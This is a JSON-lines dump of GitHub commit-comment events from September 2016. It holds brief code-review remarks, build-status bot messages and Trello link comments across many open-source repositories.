{"id":"4601814972","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19128496,"position":null,"line":null,"path":null,"commit_id":"2b2e77d5edfa2163c9d67c3098509a95f3ad833a","created_at":"2016-09-22T11:17:00Z","updated_at":"2016-09-22T11:17:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1113](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13924&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:08:44"}},"created_at":"2016-09-22T11:17:00Z"}
{"id":"4601815194","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19128497,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T11:17:04Z","updated_at":"2016-09-22T11:17:04Z","body":"@radare  lets see if @aeickho gets his asm.lst from r2. if not 'll stay with the old."}},"created_at":"2016-09-22T11:17:04Z"}
{"id":"4601816321","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19128498,"position":null,"line":null,"path":null,"commit_id":"fd698a94dd405a06c7d3512ab4591787d42949bf","created_at":"2016-09-22T11:17:20Z","updated_at":"2016-09-22T11:17:20Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;kgAilfSZ&#x2F;43-comment\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Comment</a>"}},"created_at":"2016-09-22T11:17:20Z"}
{"id":"4601816538","type":"CommitCommentEvent","actor":{"login":"wtaferner"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19128501,"position":null,"line":null,"path":null,"commit_id":"ca43594a0d9967136eb14ff88f643d395bccd86f","created_at":"2016-09-22T11:17:23Z","updated_at":"2016-09-22T11:17:23Z","body":"Pre-Release Party :tada: :cocktail: :cake: :beers: "}},"created_at":"2016-09-22T11:17:23Z"}
{"id":"4601816843","type":"CommitCommentEvent","actor":{"login":"nook-ru"},"repo":{"name":"bitrix-expert/bitrix_boilerplate"},"payload":{"comment":{"id":19128502,"position":null,"line":null,"path":null,"commit_id":"a642ad6898f9ed112fc04f9f63b3a14b645746f5","created_at":"2016-09-22T11:17:28Z","updated_at":"2016-09-22T11:17:28Z","body":"Вся магия в файле `/bitrix/modules/main/install/wizard/wizard.php`, подключаемом из `/index.php` при установке. Там определяются классы с шагами визарда и создается экземпляр `CWizardBase` с этими шагами в переменной `$wizard`.\r\n\r\nМожно попробовать подключать этот файл, придушив вывод, а потом работать с `$wizard`. Вся логика в методе `OnPostForm()` у шагов мастера."}},"created_at":"2016-09-22T11:17:28Z"}
{"id":"4601820786","type":"CommitCommentEvent","actor":{"login":"ellakdev"},"repo":{"name":"itminedu/osguide"},"payload":{"comment":{"id":19128510,"position":null,"line":null,"path":null,"commit_id":"a4169b58767237d6df6f691fe25c719809407e56","created_at":"2016-09-22T11:18:25Z","updated_at":"2016-09-22T11:18:25Z","body":"Εσωτερικός Οδηγός Ανάπτυξης Εφαρμογών Ανοιχτού Λογισμικού στο ΥΠΕΠΘ"}},"created_at":"2016-09-22T11:18:25Z"}
{"id":"4601821825","type":"CommitCommentEvent","actor":{"login":"incubus"},"repo":{"name":"ondrejbartas/sidekiq-cron"},"payload":{"comment":{"id":19128515,"position":10,"line":61,"path":"lib/sidekiq/cron/job.rb","commit_id":"b0c22b4562375f86275c1476646380de4982de5a","created_at":"2016-09-22T11:18:42Z","updated_at":"2016-09-22T11:18:42Z","body":"Here is instance in the `enque!` method:\r\n\r\n```\r\n[2] pry(#<Sidekiq::Cron::Job>)> self\r\n=> #<Sidekiq::Cron::Job:0x007f9bd948f1a8\r\n @active_job=false,\r\n @active_job_queue_name_delimiter=\"\",\r\n @active_job_queue_name_prefix=\"\",\r\n @args=[{\"type\"=>\"comments\"}],\r\n @cron=\"* * * * *\",\r\n @description=\"\",\r\n @errors=[],\r\n @fetch_missing_args=false,\r\n @klass=\"Worker::FetchLoader\",\r\n @last_enqueue_time=2016-09-22 19:14:21 +0800,\r\n @message=\"{\\\"retry\\\":true,\\\"queue\\\":\\\"comments\\\",\\\"class\\\":\\\"Worker::FetchLoader\\\",\\\"args\\\":[{\\\"type\\\":\\\"comments\\\"}]}\",\r\n @name=\"comments_loader\",\r\n @queue=\"comments\",\r\n @status=\"enabled\">\r\n\r\n[3] pry(#<Sidekiq::Cron::Job>)> self.queue_name_with_prefix\r\n=> \"comments\"\r\n[4] pry(#<Sidekiq::Cron::Job>)> @queue_name_with_prefix\r\n=> nil\r\n```"}},"created_at":"2016-09-22T11:18:42Z"}
{"id":"4601825997","type":"CommitCommentEvent","actor":{"login":"sedemglory"},"repo":{"name":"sedemglory/sedemglory.github.io"},"payload":{"comment":{"id":19128523,"position":177,"line":177,"path":"index.html","commit_id":"7c6bc7cdc65f9b43cf64aa561b58f1505a842839","created_at":"2016-09-22T11:19:42Z","updated_at":"2016-09-22T11:19:42Z","body":"<div class=\"col-sm-4\">"}},"created_at":"2016-09-22T11:19:42Z"}
{"id":"4601826438","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128524,"position":159,"line":643,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/store/parquet/Metadata.java","commit_id":"3cbe5abedf5dac943cd149dc46c7cec5511c63ca","created_at":"2016-09-22T11:19:48Z","updated_at":"2016-09-22T11:19:48Z","body":"sets min?"}},"created_at":"2016-09-22T11:19:48Z"}
{"id":"4601828360","type":"CommitCommentEvent","actor":{"login":"avhimkov"},"repo":{"name":"avhimkov/ReactHabrApp"},"payload":{"comment":{"id":19128528,"position":null,"line":null,"path":null,"commit_id":"abfceed60225f71b5304b64c8bbd9bfebd88bbbe","created_at":"2016-09-22T11:20:16Z","updated_at":"2016-09-22T11:20:16Z","body":"ok"}},"created_at":"2016-09-22T11:20:16Z"}
{"id":"4601828388","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128529,"position":159,"line":643,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/store/parquet/Metadata.java","commit_id":"3cbe5abedf5dac943cd149dc46c7cec5511c63ca","created_at":"2016-09-22T11:20:16Z","updated_at":"2016-09-22T11:20:16Z","body":"remove @return"}},"created_at":"2016-09-22T11:20:16Z"}
{"id":"4601828872","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128532,"position":154,"line":638,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/store/parquet/Metadata.java","commit_id":"3cbe5abedf5dac943cd149dc46c7cec5511c63ca","created_at":"2016-09-22T11:20:24Z","updated_at":"2016-09-22T11:20:24Z","body":"remove @return"}},"created_at":"2016-09-22T11:20:24Z"}
{"id":"4601838141","type":"CommitCommentEvent","actor":{"login":"longfeier"},"repo":{"name":"longfeier/HelloWord"},"payload":{"comment":{"id":19128552,"position":null,"line":null,"path":null,"commit_id":"400c6606ea56ee233a5ffbed1ea9512de5c6d6fa","created_at":"2016-09-22T11:22:44Z","updated_at":"2016-09-22T11:22:44Z","body":"now  i will change something because there is something wrong"}},"created_at":"2016-09-22T11:22:44Z"}
{"id":"4601839084","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19128554,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T11:22:57Z","updated_at":"2016-09-22T11:22:57Z","body":"the build is 1 month old, but the version is 3 months old"}},"created_at":"2016-09-22T11:22:57Z"}
{"id":"4601841170","type":"CommitCommentEvent","actor":{"login":"sedemglory"},"repo":{"name":"sedemglory/sedemglory.github.io"},"payload":{"comment":{"id":19128564,"position":177,"line":177,"path":"index.html","commit_id":"7c6bc7cdc65f9b43cf64aa561b58f1505a842839","created_at":"2016-09-22T11:23:27Z","updated_at":"2016-09-22T11:23:27Z","body":"<div class=\"col-sm-4\">"}},"created_at":"2016-09-22T11:23:27Z"}
{"id":"4601844603","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128575,"position":219,"line":979,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/store/parquet/Metadata.java","commit_id":"3cbe5abedf5dac943cd149dc46c7cec5511c63ca","created_at":"2016-09-22T11:24:17Z","updated_at":"2016-09-22T11:24:17Z","body":"change to primitive"}},"created_at":"2016-09-22T11:24:17Z"}
{"id":"4601847622","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19128586,"position":null,"line":null,"path":null,"commit_id":"9c7187bf46d523465e6693ddc0804ce2af7cd736","created_at":"2016-09-22T11:25:00Z","updated_at":"2016-09-22T11:25:00Z","body":"😭 I like Æ\r\n\r\nYou're right, an interesting move. This makes a lot of card not represent their printed version. However in gatherer card names outside of oracle text haven't changed.  [Æther Barrier](http://gatherer.wizards.com/Pages/Card/Details.aspx?multiverseid=22289)\r\n\r\nMTG.json hasn't done a full parse of oracle changes as yet - I would guess we could avoid a mass reparse ourselves until next month. This is the only card with a printed change."}},"created_at":"2016-09-22T11:25:00Z"}
{"id":"4601848515","type":"CommitCommentEvent","actor":{"login":"desaishivam26"},"repo":{"name":"Tesla-M-Devices/android_device_motorola_lux"},"payload":{"comment":{"id":19128589,"position":null,"line":null,"path":null,"commit_id":"56229586aba7c28c49f9fdbace9753cdea17e15a","created_at":"2016-09-22T11:25:13Z","updated_at":"2016-09-22T11:25:13Z","body":"isn't needed anymore\r\n"}},"created_at":"2016-09-22T11:25:13Z"}
{"id":"4601849136","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19128590,"position":null,"line":null,"path":null,"commit_id":"6364de5ce52bfd9c3349355d9e85ab010d375ca3","created_at":"2016-09-22T11:25:23Z","updated_at":"2016-09-22T11:25:23Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;kgAilfSZ&#x2F;43-comment\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Comment</a>"}},"created_at":"2016-09-22T11:25:23Z"}
{"id":"4601851950","type":"CommitCommentEvent","actor":{"login":"yukainicholas"},"repo":{"name":"yukainicholas/yukainicholas.github.io"},"payload":{"comment":{"id":19128596,"position":2,"line":2,"path":"README.md","commit_id":"654cafb5b587641f4b004c9bb2d35fe06d6cef90","created_at":"2016-09-22T11:26:02Z","updated_at":"2016-09-22T11:26:02Z","body":"fdd\r\n"}},"created_at":"2016-09-22T11:26:02Z"}
{"id":"4601853788","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19128600,"position":7,"line":39,"path":"src/SkirtBrim.cpp","commit_id":"0b4eda9592d2025b8461524eb4562013160eb82b","created_at":"2016-09-22T11:26:30Z","updated_at":"2016-09-22T11:26:30Z","body":"We aren't typically very strict about it. 99% of the constants are exported in the form of a setting. The rest is always very specific to the algorithm, or has very little effect. In this case, `join_distance` has very little effect (0.02mm details). `largest_error_of_removed_point` is fairly abstract and implementation specific. `smallest_line_length` is the most important of the three. But all this is just for the amount of detail we retain on the brim lines, so I don't think anyone would find a use case for adjusting it.\r\n\r\nBut in the code, I agree that it's somewhat easier to have it on the top of the file. But having it near to where they are used is also nice. I wouldn't bother to move them up. Perhaps make them `constexpr`. But not blocking."}},"created_at":"2016-09-22T11:26:30Z"}
{"id":"4601854908","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128601,"position":130,"line":157,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/store/parquet/ParquetReaderUtility.java","commit_id":"3cbe5abedf5dac943cd149dc46c7cec5511c63ca","created_at":"2016-09-22T11:26:45Z","updated_at":"2016-09-22T11:26:45Z","body":"add proper description or remove"}},"created_at":"2016-09-22T11:26:45Z"}
{"id":"4601855851","type":"CommitCommentEvent","actor":{"login":"araghunde"},"repo":{"name":"KalamaresFTW/PracticasDS"},"payload":{"comment":{"id":19128602,"position":42,"line":50,"path":"DS-34-11-B1/src/ejercicio1/Collatz.java","commit_id":"2adfafa040a8adb9141fa0f294301ef1fd7ca478","created_at":"2016-09-22T11:26:59Z","updated_at":"2016-09-22T11:26:59Z","body":"Pero como hostia non vai fallar si eres sunormal 😆 "}},"created_at":"2016-09-22T11:26:59Z"}
{"id":"4601858780","type":"CommitCommentEvent","actor":{"login":"mfalt"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19128607,"position":10,"line":14,"path":"src/functions/indBox.jl","commit_id":"9798374187a9b561b0fdb8581feebeb8a28cb74a","created_at":"2016-09-22T11:27:44Z","updated_at":"2016-09-22T11:27:44Z","body":"I do not understand why you are doing this. Is there any point in saving iter_lb and iter_ub? And if there is, they should probably have some type."}},"created_at":"2016-09-22T11:27:44Z"}
{"id":"4601859030","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19128609,"position":null,"line":null,"path":null,"commit_id":"5bdc4bac1121ac86077cefa7f6b293d5345724ff","created_at":"2016-09-22T11:27:48Z","updated_at":"2016-09-22T11:27:48Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;kgAilfSZ&#x2F;43-comment\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Comment</a>"}},"created_at":"2016-09-22T11:27:48Z"}
{"id":"4601859037","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128610,"position":199,"line":226,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/store/parquet/ParquetReaderUtility.java","commit_id":"3cbe5abedf5dac943cd149dc46c7cec5511c63ca","created_at":"2016-09-22T11:27:48Z","updated_at":"2016-09-22T11:27:48Z","body":"@return remove"}},"created_at":"2016-09-22T11:27:48Z"}
{"id":"4601860149","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"cmfcmf/MediaModule"},"payload":{"comment":{"id":19128613,"position":null,"line":null,"path":null,"commit_id":"8810f6aa64060db346db89746e0facc4ea1d8924","created_at":"2016-09-22T11:28:04Z","updated_at":"2016-09-22T11:28:04Z","body":"Nice :+1: \r\n\r\nAnother alternative is https://dsmorse.github.io/gridster.js/\r\nWhile I did some projects with masonry, I did not test gridster in practice yet though."}},"created_at":"2016-09-22T11:28:04Z"}
{"id":"4601862262","type":"CommitCommentEvent","actor":{"login":"andtii"},"repo":{"name":"preciofishbone/Omnia-Foundation-Docs"},"payload":{"comment":{"id":19128617,"position":null,"line":null,"path":null,"commit_id":"a2ffcf6e0efc0452c22565b08c1f5b810f54fdbe","created_at":"2016-09-22T11:28:32Z","updated_at":"2016-09-22T11:28:32Z","body":"@khdi Maybe we should include somewhere that the bundling is recursive"}},"created_at":"2016-09-22T11:28:32Z"}
{"id":"4601863062","type":"CommitCommentEvent","actor":{"login":"ojw28"},"repo":{"name":"google/ExoPlayer"},"payload":{"comment":{"id":19128619,"position":null,"line":null,"path":null,"commit_id":"42e10c762543b2bdcb5517ab5fdfd583a59a479d","created_at":"2016-09-22T11:28:44Z","updated_at":"2016-09-22T11:28:44Z","body":"2.14.1 isn't compatible with plugin version 2.1.2."}},"created_at":"2016-09-22T11:28:44Z"}
{"id":"4601874940","type":"CommitCommentEvent","actor":{"login":"40423236"},"repo":{"name":"40423236/40423236.github.io"},"payload":{"comment":{"id":19128642,"position":null,"line":null,"path":null,"commit_id":"29f31053ec54681867406a6f405820d0ab1c28a9","created_at":"2016-09-22T11:31:32Z","updated_at":"2016-09-22T11:31:32Z","body":"123456"}},"created_at":"2016-09-22T11:31:32Z"}
{"id":"4601876401","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19128645,"position":null,"line":null,"path":null,"commit_id":"768f91c227d48ab39b4e06a49a222a01cb8f4e3e","created_at":"2016-09-22T11:31:55Z","updated_at":"2016-09-22T11:31:55Z","body":"It compiles and links locally for armv6l-musl :-/"}},"created_at":"2016-09-22T11:31:55Z"}
{"id":"4601881549","type":"CommitCommentEvent","actor":{"login":"benjaoming"},"repo":{"name":"django-money/django-money"},"payload":{"comment":{"id":19128658,"position":null,"line":null,"path":null,"commit_id":"1ac711612be9312301e43fb76c88cc998f176fb0","created_at":"2016-09-22T11:33:12Z","updated_at":"2016-09-22T11:33:12Z","body":"No, I'm pretty sure I've fixed it. Running `pre-commit run --all-files` shouldn't yield changes on a clean master."}},"created_at":"2016-09-22T11:33:12Z"}
{"id":"4601883187","type":"CommitCommentEvent","actor":{"login":"pelikhan"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":19128661,"position":5,"line":1028,"path":"webapp/src/app.tsx","commit_id":"3dc29cbcb5b7695c4be917e43b631789dfbd31bb","created_at":"2016-09-22T11:33:37Z","updated_at":"2016-09-22T11:33:37Z","body":"seems that we could refactor this into a helper function."}},"created_at":"2016-09-22T11:33:37Z"}
{"id":"4601887460","type":"CommitCommentEvent","actor":{"login":"topnessman"},"repo":{"name":"opprop/checker-framework"},"payload":{"comment":{"id":19128664,"position":null,"line":null,"path":null,"commit_id":"2c8f8bdd3e112d6c48b9220bca7ad1d98f6a089a","created_at":"2016-09-22T11:34:42Z","updated_at":"2016-09-22T11:34:42Z","body":"Why does the travis for this PR pass but that of push of the same commit fail? I can't find a good explanation."}},"created_at":"2016-09-22T11:34:42Z"}
{"id":"4601889148","type":"CommitCommentEvent","actor":{"login":"agrey1"},"repo":{"name":"harrya/IndustrialProject"},"payload":{"comment":{"id":19128668,"position":null,"line":null,"path":null,"commit_id":"cd346995c8799017a47c661df967e4afa5ad4169","created_at":"2016-09-22T11:35:08Z","updated_at":"2016-09-22T11:35:08Z","body":"Forgot to mention that parity checking was added with this commit"}},"created_at":"2016-09-22T11:35:08Z"}
{"id":"4601890436","type":"CommitCommentEvent","actor":{"login":"pedroafsouza"},"repo":{"name":"mkotsur/restito"},"payload":{"comment":{"id":19128674,"position":null,"line":null,"path":null,"commit_id":"2b41040da15587644f257d9dcf5387750a4c724c","created_at":"2016-09-22T11:35:28Z","updated_at":"2016-09-22T11:35:28Z","body":"Hi, I am really looking for ward to have this changes :dancer: Do u have any idea when we will get it?"}},"created_at":"2016-09-22T11:35:28Z"}
{"id":"4601890628","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128675,"position":351,"line":351,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestCorruptParquetDateCorrection.java","commit_id":"3cbe5abedf5dac943cd149dc46c7cec5511c63ca","created_at":"2016-09-22T11:35:30Z","updated_at":"2016-09-22T11:35:30Z","body":"private"}},"created_at":"2016-09-22T11:35:30Z"}
{"id":"4601892437","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128681,"position":524,"line":524,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestCorruptParquetDateCorrection.java","commit_id":"3cbe5abedf5dac943cd149dc46c7cec5511c63ca","created_at":"2016-09-22T11:35:56Z","updated_at":"2016-09-22T11:35:56Z","body":"private"}},"created_at":"2016-09-22T11:35:56Z"}
{"id":"4601892524","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19128683,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T11:35:57Z","updated_at":"2016-09-22T11:35:57Z","body":"ok.. i update radare\r\n"}},"created_at":"2016-09-22T11:35:57Z"}
{"id":"4601903577","type":"CommitCommentEvent","actor":{"login":"perchrh"},"repo":{"name":"google/ExoPlayer"},"payload":{"comment":{"id":19128713,"position":null,"line":null,"path":null,"commit_id":"42e10c762543b2bdcb5517ab5fdfd583a59a479d","created_at":"2016-09-22T11:38:32Z","updated_at":"2016-09-22T11:38:32Z","body":"I was wondering about that, 2.1.2 lists Gradle 2.13 as required, but that doesn't mean 2.13 or compatible, perhaps. "}},"created_at":"2016-09-22T11:38:32Z"}
{"id":"4601905335","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128718,"position":141,"line":599,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/store/parquet/Metadata.java","commit_id":"3cbe5abedf5dac943cd149dc46c7cec5511c63ca","created_at":"2016-09-22T11:38:58Z","updated_at":"2016-09-22T11:38:58Z","body":"to primitive, rename method"}},"created_at":"2016-09-22T11:38:58Z"}
{"id":"4601906595","type":"CommitCommentEvent","actor":{"login":"lostella"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19128723,"position":10,"line":14,"path":"src/functions/indBox.jl","commit_id":"9798374187a9b561b0fdb8581feebeb8a28cb74a","created_at":"2016-09-22T11:39:17Z","updated_at":"2016-09-22T11:39:17Z","body":"Whoops! My bad, I forgot to remove them, fixing it. Although we might want to go through appropriately redefining `Base.getindex` like you said."}},"created_at":"2016-09-22T11:39:17Z"}
{"id":"4601909272","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":19128730,"position":null,"line":null,"path":null,"commit_id":"4cfa84d4c0173e26e03fdc9ed635dfb36e814083","created_at":"2016-09-22T11:39:58Z","updated_at":"2016-09-22T11:39:58Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;TgZhDv4g&#x2F;1978-bug-987992-doc-rbd-format-2-is-default-in-ses-3-0-documentation-needs-to-be-updated\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug 987992 - [doc] RBD format 2 is default in SES 3.0 -&gt; documentation needs to be updated</a>"}},"created_at":"2016-09-22T11:39:58Z"}
{"id":"4601913510","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19128738,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-22T11:40:57Z","updated_at":"2016-09-22T11:40:57Z","body":"As agreed on https://github.com/oe-alliance/e2openplugin-OpenWebif/pull/30#issuecomment-248608251"}},"created_at":"2016-09-22T11:40:57Z"}
{"id":"4601914956","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128742,"position":37,"line":48,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/store/parquet/ParquetFormatConfig.java","commit_id":"3cbe5abedf5dac943cd149dc46c7cec5511c63ca","created_at":"2016-09-22T11:41:17Z","updated_at":"2016-09-22T11:41:17Z","body":"1231 : 1237"}},"created_at":"2016-09-22T11:41:17Z"}
{"id":"4601916039","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19128745,"position":null,"line":null,"path":null,"commit_id":"be49ee5145169a92fd9fc06827a1e6ba7ca0385b","created_at":"2016-09-22T11:41:33Z","updated_at":"2016-09-22T11:41:33Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2341 of 2341 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T11:41:33Z"}
{"id":"4601917828","type":"CommitCommentEvent","actor":{"login":"sic2"},"repo":{"name":"dainoequinoziale/dainoequinoziale.github.io"},"payload":{"comment":{"id":19128749,"position":38,"line":7,"path":"_posts/2016-09-20-20-settembre.markdown","commit_id":"46d2a8fb476ecc91ee79256b1570f3746f8adfbc","created_at":"2016-09-22T11:42:00Z","updated_at":"2016-09-22T11:42:00Z","body":"@dainoequinoziale \r\nThis header (GREEN) looks the same as in the post deleted (see RED text). However, I did found out that on line 1 we had: `<U+FEFF>---` instead of `---`.\r\nThis caused the post to be published under `/2016/09/19/` rather than under `/non-accade/2016/09/19/` as it should be.\r\n\r\nAlso, note that I have put some more instructions on how to write posts and articles in the [README.md](https://github.com/dainoequinoziale/dainoequinoziale.github.io/blob/master/README.md)"}},"created_at":"2016-09-22T11:42:00Z"}
{"id":"4601917877","type":"CommitCommentEvent","actor":{"login":"Pccnzb"},"repo":{"name":"Mooophy/Cpp-Primer"},"payload":{"comment":{"id":19128750,"position":null,"line":null,"path":null,"commit_id":"3b5ddad1f32a1a5c0bb4b2a2a2608f6dce535f8b","created_at":"2016-09-22T11:42:00Z","updated_at":"2016-09-22T11:42:00Z","body":"您好，我尝试运行这个程序，但是编译器报错： error C3551: 应提供结尾返回类型 \r\n![image](https://cloud.githubusercontent.com/assets/11958354/18746879/8111a90e-80fc-11e6-8620-8a50ad9e492c.png)\r\n是我的编译器问题吗？好像auto在这里不能推断出返回类型\r\n\r\n"}},"created_at":"2016-09-22T11:42:00Z"}
{"id":"4601918656","type":"CommitCommentEvent","actor":{"login":"AmatanHead"},"repo":{"name":"AmatanHead/collective-blog"},"payload":{"comment":{"id":19128752,"position":null,"line":null,"path":null,"commit_id":"6c782aaa82f7df626489b44da43191ab98b2f6bc","created_at":"2016-09-22T11:42:12Z","updated_at":"2016-09-22T11:42:12Z","body":"Closes #2."}},"created_at":"2016-09-22T11:42:12Z"}
{"id":"4601923616","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19128759,"position":13,"line":41,"path":"core/descriptor.loader.java/src/org/jetbrains/kotlin/load/kotlin/DeserializationComponentsForJava.kt","commit_id":"6e679acfb1ea606bc448e3981c97c56fae80cc51","created_at":"2016-09-22T11:43:20Z","updated_at":"2016-09-22T11:43:20Z","body":"This comment would be more useful if it explained in what case exactly does that happen"}},"created_at":"2016-09-22T11:43:20Z"}
{"id":"4601926385","type":"CommitCommentEvent","actor":{"login":"SergSvl"},"repo":{"name":"SergSvl/test"},"payload":{"comment":{"id":19128761,"position":null,"line":null,"path":null,"commit_id":"866001b2c9dd41f62d6fb8ab861956b2bd6b87c4","created_at":"2016-09-22T11:44:01Z","updated_at":"2016-09-22T11:44:01Z","body":"Коммент к чему-то"}},"created_at":"2016-09-22T11:44:01Z"}
{"id":"4601926911","type":"CommitCommentEvent","actor":{"login":"flub"},"repo":{"name":"mattduck/pytest"},"payload":{"comment":{"id":19128762,"position":32,"line":323,"path":"_pytest/assertion/util.py","commit_id":"72acda12f607be4874ac2caea0f0c0a605666c5d","created_at":"2016-09-22T11:44:09Z","updated_at":"2016-09-22T11:44:09Z","body":"Not sure it's right to use this `_running_on_ci()` condition.  It's a very hidden configuration option.  Either it needs to be configured separetely and then it probably needs a new command line option or config file option or it's fine being linked to -vN."}},"created_at":"2016-09-22T11:44:09Z"}
{"id":"4601927949","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19128764,"position":null,"line":null,"path":null,"commit_id":"a601645c36749607ff70b449cc9fa452448f7dab","created_at":"2016-09-22T11:44:25Z","updated_at":"2016-09-22T11:44:25Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2362 of 2373 tests passed, 1 test warnings)\n\n * 3 tests had: AUD diffs.\n * 6 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 6 tests had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a601645c36749607ff70b449cc9fa452448f7dab-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a601645c36749607ff70b449cc9fa452448f7dab-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.54%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T11:44:25Z"}
